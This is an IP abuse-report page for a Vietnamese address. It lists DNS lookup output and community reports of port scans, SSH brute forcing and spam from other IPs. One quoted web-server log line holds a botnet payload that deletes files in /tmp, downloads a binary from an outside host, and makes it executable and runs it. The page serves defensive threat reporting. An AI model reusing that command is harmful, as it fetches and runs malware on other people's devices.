14.250.242.208

Basic Info

City: unknown

Region: unknown

Country: Viet Nam

Internet Service Provider: Vietnam Posts and Telecommunications Group

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	Unauthorized connection attempt from IP address 14.250.242.208 on Port 445(SMB)	2020-05-28 21:47:53

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 14.250.242.208
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 58868
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;14.250.242.208.			IN	A

;; AUTHORITY SECTION:
.			172	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020052800 1800 900 604800 86400

;; Query time: 57 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu May 28 21:47:49 CST 2020
;; MSG SIZE  rcvd: 118

Host info

208.242.250.14.in-addr.arpa domain name pointer static.vnpt.vn.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
208.242.250.14.in-addr.arpa	name = static.vnpt.vn.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
119.236.26.51	attack	Honeypot attack, port: 5555, PTR: n11923626051.netvigator.com.	2020-09-09 02:39:02
107.172.211.78	attackspam	2020-09-07 11:42:03.296187-0500 localhost smtpd[72242]: NOQUEUE: reject: RCPT from unknown[107.172.211.78]: 554 5.7.1 Service unavailable; Client host [107.172.211.78] blocked using zen.spamhaus.org; https://www.spamhaus.org/sbl/query/SBLCSS; from= to= proto=ESMTP helo=<00fd8916.asainprodate.co>	2020-09-09 02:52:39
5.188.86.210	attack	Cowrie Honeypot: Unauthorised SSH/Telnet login attempt with user "root" at 2020-09-08T18:16:44Z	2020-09-09 02:29:35
150.109.193.247	attackspam	Port Scan/VNC login attempt ...	2020-09-09 02:47:59
140.143.0.121	attackspambots	Sep 8 18:09:48 dhoomketu sshd[2957840]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.0.121 Sep 8 18:09:48 dhoomketu sshd[2957840]: Invalid user numnoy from 140.143.0.121 port 54082 Sep 8 18:09:50 dhoomketu sshd[2957840]: Failed password for invalid user numnoy from 140.143.0.121 port 54082 ssh2 Sep 8 18:14:22 dhoomketu sshd[2957885]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.0.121 user=root Sep 8 18:14:24 dhoomketu sshd[2957885]: Failed password for root from 140.143.0.121 port 48104 ssh2 ...	2020-09-09 02:59:47
118.25.70.54	attackspam	Port Scan/VNC login attempt ...	2020-09-09 02:32:59
5.101.218.90	attackbots	TCP Port: 25 invalid blocked Listed on abuseat-org also zen-spamhaus and spamrats (208)	2020-09-09 02:37:17
192.241.227.136	attackspambots	MultiHost/MultiPort Probe, Scan, Hack -	2020-09-09 03:01:20
138.59.146.251	attack	From send-edital-1618-oaltouruguai.com.br-8@vendastop10.com.br Mon Sep 07 13:47:53 2020 Received: from mm146-251.vendastop10.com.br ([138.59.146.251]:46139)	2020-09-09 02:59:26
89.248.168.107	attackspam	Sep 8 20:19:04 cho postfix/smtps/smtpd[2506502]: warning: unknown[89.248.168.107]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Sep 8 20:21:40 cho postfix/smtps/smtpd[2506502]: warning: unknown[89.248.168.107]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Sep 8 20:23:20 cho postfix/smtps/smtpd[2508964]: warning: unknown[89.248.168.107]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Sep 8 20:25:42 cho postfix/smtps/smtpd[2506502]: warning: unknown[89.248.168.107]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Sep 8 20:26:18 cho postfix/smtps/smtpd[2510090]: warning: unknown[89.248.168.107]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 ...	2020-09-09 02:45:05
85.99.139.153	attackbots	Honeypot attack, port: 445, PTR: 85.99.139.153.static.ttnet.com.tr.	2020-09-09 02:29:10
111.12.52.238	attack	SSH brute force attempt (m)	2020-09-09 02:26:11
213.32.23.58	attack	2020-09-08T20:39:21.612962hostname sshd[68168]: Failed password for root from 213.32.23.58 port 32914 ssh2 ...	2020-09-09 02:58:21
197.42.214.178	attackspam	webserver:80 [07/Sep/2020] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws HTTP/1.1" 404 397 "-" "Hello, world"	2020-09-09 02:33:25
114.104.130.57	attackspam	Lines containing failures of 114.104.130.57 (max 1000) Sep 7 16:09:04 nexus sshd[14633]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.104.130.57 user=r.r Sep 7 16:09:06 nexus sshd[14633]: Failed password for r.r from 114.104.130.57 port 50502 ssh2 Sep 7 16:09:07 nexus sshd[14633]: Received disconnect from 114.104.130.57 port 50502:11: Bye Bye [preauth] Sep 7 16:09:07 nexus sshd[14633]: Disconnected from 114.104.130.57 port 50502 [preauth] Sep 7 16:21:17 nexus sshd[14696]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.104.130.57 user=r.r Sep 7 16:21:19 nexus sshd[14696]: Failed password for r.r from 114.104.130.57 port 38177 ssh2 Sep 7 16:21:19 nexus sshd[14696]: Received disconnect from 114.104.130.57 port 38177:11: Bye Bye [preauth] Sep 7 16:21:19 nexus sshd[14696]: Disconnected from 114.104.130.57 port 38177 [preauth] Sep 7 16:26:26 nexus sshd[14898]: pam_unix(sshd:a........ ------------------------------	2020-09-09 02:53:01

Recently Reported IPs

176.172.192.151	70.118.15.103	42.2.131.73	213.120.198.226
194.61.55.81	201.250.33.38	67.135.108.42	220.127.40.131
45.131.194.60	221.127.7.20	220.133.146.46	45.251.135.64
121.128.199.97	16.76.83.198	40.127.90.88	224.219.139.164
55.104.150.141	27.72.146.13	180.211.238.125	200.0.233.96